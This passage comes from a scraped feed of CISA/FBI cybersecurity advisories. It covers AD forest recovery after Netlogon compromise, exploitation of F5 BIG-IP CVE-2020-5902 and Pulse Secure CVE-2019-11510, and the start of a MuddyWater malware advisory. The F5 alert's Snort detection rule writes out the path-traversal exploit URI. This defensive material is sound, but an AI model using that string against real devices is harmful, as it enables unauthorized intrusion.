CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>)\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | FortiOS 6.0: 6.0.0 to 6.0.4; FortiOS 5.6: 5.6.3 to 5.6.7; FortiOS 5.4: 5.4.6 to 5.4.12 | [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Windows Server 2008 R2 for x64-based Systems Service Pack 1; Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation); Windows Server 2012; Windows Server 2012 (Server Core installation); Windows Server 2012 R2; Windows Server 2016; Windows Server 2019; Windows Server 2019 (Server Core installation); Windows Server, version 1903 (Server Core installation); Windows Server, version 1909 (Server Core installation); Windows Server, version 2004 (Server Core installation) | [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n * Follow Microsoft\u2019s [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on monitoring logs for activity related to the Netlogon 
vulnerability, CVE-2020-1472.\n * If appropriate for your organization\u2019s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on [SMB Security Best Practices](<https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices>) for more information.\n * Implement the prevention, detection, and mitigation strategies outlined in: \n * CISA Alert [TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n * National Security Agency Cybersecurity Information Sheet [U/OO/134094-20 \u2013 Detect and Prevent Web Shells Malware](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/>).\n * Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.\n * Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.\n * Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `WINDOWS` folders. 
All other locations should be disallowed unless an exception is granted.\n * Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.\n\n#### Comprehensive Account Resets\n\nFor accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT \u201cGolden Tickets\u201d may be required, and Microsoft has released specialized [guidance](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts>) for this. Such a reset should be performed very carefully if needed.\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise\u2014as well as in Azure-hosted\u2014AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. 
Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password;[[1](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)] this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned):\n    1. User accounts (forced reset with no legacy password reuse)\n    2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n    3. Service accounts\n    4. Directory Services Restore Mode (DSRM) account\n    5. Domain Controller machine account\n    6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n#### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. 
See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates.\n * **Implement MFA on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit** configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement** MFA, especially for privileged accounts.\n * **Use** separate administrative accounts on separate administration workstations.\n * **Keep** [software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### Resources\n\n * APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations \u2013 <https://us-cert.cisa.gov/ncas/alerts/aa20-283a>\n * CISA Activity Alert CVE-2019-19781 \u2013 <https://us-cert/cisa.gov/ncas/alerts/aa20-031a>\n * CISA Vulnerability Bulletin \u2013 <https://us-cert/cisa.gov/ncas/bulletins/SB19-161>\n * CISA Current Activity \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>\n * Citrix Directory Traversal Bug (CVE-2019-19781) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * Microsoft Exchange remote code execution flaw (CVE-2020-0688) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-0688>\n * CVE-2018-13379 \u2013 [https://nvd.nist.gov/vuln/detail/CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379%20>)\n * CVE-2020-1472 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-1472>\n * CVE 2019-10149 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-10149>\n * NCCIC/USCERT Alert TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance \u2013 [https://us-cert.cisa.gov/ncas/alerts/TA15-314A](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A%20>)\n * NCCIC/US-CERT publication on SMB Security Best Practices \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices> \n\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. 
The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 22, 2020: Initial Version|November 17, 2020: Added U.S. Heat Map of Activity|December 1, 2020: Added \"current as of\" date to U.S. Heat Map of Activity\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-01T12:00:00", "type": "ics", "title": "Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. 
Government Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-12-01T12:00:00", "id": "AA20-296A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:35:51", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this alert in response to recently disclosed exploits that target F5 BIG-IP devices that are vulnerable to CVE-2020-5902. F5 Networks, Inc. (F5) released a patch for CVE-2020-5902 on June 30, 2020.[[1]](<https://support.f5.com/csp/article/K52145254>) Unpatched F5 BIG-IP devices are an attractive target for malicious actors. Affected organizations that have not applied the patch to fix this critical remote code execution (RCE) vulnerability risk an attacker exploiting CVE-2020-5902 to take control of their system. **Note:** F5\u2019s security advisory for CVE-2020-5902 states that there is a high probability that any remaining unpatched devices are likely already compromised.\n\nCISA expects to see continued attacks exploiting unpatched F5 BIG-IP devices and strongly urges users and administrators to upgrade their software to the fixed versions. 
CISA also advises that administrators deploy the signature included in this Alert to help them determine whether their systems have been compromised.\n\nThis Alert also provides additional detection measures and mitigations for victim organizations to help recover from attacks resulting from CVE-2020-5902. CISA encourages administrators to remain aware of the ramifications of exploitation and to use the recommendations in this alert to help secure their organization\u2019s systems against attack.\n\n### Background\n\nCISA has conducted incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2020-5902\u2014an RCE vulnerability in the BIG-IP Traffic Management User Interface (TMUI)\u2014to take control of victim systems. On June 30, F5 disclosed CVE-2020-5902, stating that it allows attackers to, \u201cexecute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\u201d\n\nOn July 4, open-source reporting indicated a proof-of-concept code was available and threat actors were exploiting the vulnerability by attempting to steal credentials. On July 5, security researchers posted exploits that would allow threat actors to exfiltrate data or execute commands on vulnerable devices. The risk posed by the vulnerability is critical.\n\n### Technical Details\n\nCISA has observed scanning and reconnaissance, as well as confirmed compromises, within a few days of F5\u2019s patch release for this vulnerability. As early as July 6, 2020, CISA has seen broad scanning activity for the presence of this vulnerability across federal departments and agencies\u2014this activity is currently occurring as of the publication of this Alert.\n\nCISA has been working with several entities across multiple sectors to investigate potential compromises relating to this vulnerability. CISA has confirmed two compromises and is continuing to investigate. 
CISA will update this Alert with any additional actionable information.\n\n### Detection Methods\n\nCISA recommends administrators see the F5 Security Advisory K52145254 for indicators of compromise and F5\u2019s CVE-2020-5902 IoC Detection Tool.[[2]](<https://support.f5.com/csp/article/K52145254>) CISA also recommends organizations complete the following actions in conducting their hunt for this exploit:\n\n * Quarantine or take offline potentially affected systems\n * Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections\n * Deploy the following CISA-created Snort signature to detect malicious activity: \n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"BIG-IP:HTTP URI GET contains '/tmui/login.jsp/..|3b|/tmui/':CVE-2020-5902\"; sid:1; rev:1; flow:established,to_server; content:\"/tmui/login.jsp/..|3b|/tmui/\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; priority:2; reference:url,github.com/yassineaboukir/CVE-2020-5902; reference:cve,2020-5902; metadata:service http;)`\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their BIG-IP software to the corresponding patches for CVE-2020-5902. If organizations detect evidence of CVE-2020-5902 exploitation after patching and applying the detection measures in this alert, CISA recommends taking immediate action to reconstitute affected systems.\n\nShould an organization\u2019s IT security personnel discover system compromise, CISA recommends they:\n\n * Reimage compromised hosts\n * Provision new account credentials\n * Limit access to the management interface to the fullest extent possible\n * Implement network segmentation \n * **Note:** network segmentation is a very effective security mechanism to help prevent an intruder from propagating exploits or laterally moving within an internal network. Segregation separates network segments based on role and functionality. 
A securely segregated network can limit the spread of malicious occurrences, reducing the impact from intruders that gain a foothold somewhere inside the network.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" )\n\n### References\n\n[[1] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[[2] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[CISA Factsheet: Guidance for F5 BIG-IP TMUI Vulnerability (CVE-2020-5902)](<https://www.cisa.gov/publication/guidance-f5-big-ip-vulnerability-fact-sheet>)\n\n### Revisions\n\nJuly 24, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T12:00:00", "type": "ics", "title": "Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-07-24T12:00:00", "id": "AA20-206A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:50:23", "description": "### Summary\n\nUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack. [[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nAlthough Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/ >) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications >) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\nCISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. 
[[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n## Timelines of Specific Events\n\n * April 24, 2019 \u2013 Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.\n * May 28, 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne.\n * July 31, 2019 \u2013 Full use of exploit demonstrated using the admin session hash to get complete shell.\n * August 8, 2019 \u2013 Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.\n * August 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.\n * October 7, 2019 \u2013 The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.\n * October 16, 2019 \u2013 The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.\n * January 2020 \u2013 Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. \n\n### Technical Details\n\n## Impact\n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. 
It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.\n\nAffected versions:\n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3\n * Pulse Connect Secure 8.3R1 - 8.3R7\n * Pulse Connect Secure 8.2R1 - 8.2R12\n * Pulse Connect Secure 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1\n * Pulse Policy Secure 5.4R1 - 5.4R7\n * Pulse Policy Secure 5.3R1 - 5.3R12\n * Pulse Policy Secure 5.2R1 - 5.2R12\n * Pulse Policy Secure 5.1R1 - 5.1R15\n\n### Mitigations\n\nThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.\n\nCISA strongly urges users and administrators to upgrade to the corresponding fixes. [[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### References\n\n[[1] NIST NVD CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)\n\n[[4] CISA Current Activity Vulnerabilities in Multiple VPN Applications ](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)\n\n[[5] CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\n[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### Revisions\n\nJanuary 10, 2020: Initial Version|April 15, 2020: Revised to correct type of vulnerability\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T20:08:23", "description": "### Summary\n\n**Actions to Take Today to Protect Against Malicious Activity** \n* Search for indicators of compromise. \n* Use antivirus software. \n* [Patch](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) all systems. \n* Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n* Train users to recognize and report [phishing attempts](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n* Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n\n_**Note: **this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 10. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom\u2019s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors\u2014including telecommunications, defense, local government, and oil and natural gas\u2014in Asia, Africa, Europe, and North America. **Note:** MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.\n\nMuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[[1](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.\n\nMuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims\u2019 systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)\u2014to trick legitimate programs into running malware\u2014and obfuscating PowerShell scripts to hide command and control (C2) functions. 
FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware\u2014variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS\u2014along with other tools as part of their malicious activity. \n\nThis advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. \n\nFBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. **Note:** also see the Additional Resources section.\n\n * Malware Analysis Report \u2013 [MAR-10369127-1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>)\n * IOCs \u2013 AA22-052A.stix and MAR-10369127-1.v1.stix\n * CISA's webpage \u2013 [Iran Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/iran>)\n * [NCSC-UK MAR \u2013 Small Sieve](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>)\n * [CNMF's press release \u2013 Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nFBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 
\n\nAs part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor\u2019s C2 server or a PDF file that drops a malicious file to the victim\u2019s network [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001/>), [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>)]. MuddyWater actors also use techniques such as side-loading DLLs [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)] to trick legitimate programs into running malware and obfuscating PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)] to hide C2 functions [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)] (see the PowGoop section for more information). \n\nAdditionally, the group uses multiple malware sets\u2014including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS\u2014for loading malware, backdoor access, persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)], and exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]. See below for descriptions of some of these malware sets, including newer tools or variants to the group\u2019s suite. Additionally, see Malware Analysis Report [MAR-10369127.r1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) for further details.\n\n#### **PowGoop**\n\nMuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. 
The malicious file impersonates a legitimate file that is signed as a Google Update executable file.\n\nAccording to samples of PowGoop analyzed by [CISA](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) and [CNMF](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), PowGoop consists of three components:\n\n * A DLL file renamed as a legitimate filename, `Goopdate.dll`, to enable the DLL side-loading technique [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)]. The DLL file is contained within an executable, `GoogleUpdate.exe`. \n * A PowerShell script, obfuscated as a .dat file, `goopdate.dat`, used to decrypt and run a second obfuscated PowerShell script, `config.txt` [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)].\n * `config.txt`, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.\n\nThese components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. \n\n#### **Small Sieve**\n\nAccording to a sample [analyzed by NCSC-UK](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>), Small Sieve is a simple Python [[T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006/>)] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, `gram_app.exe`. The NSIS installs the Python backdoor, `index.exe`, and adds it as a registry run key [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)], enabling persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]. \n\nMuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. 
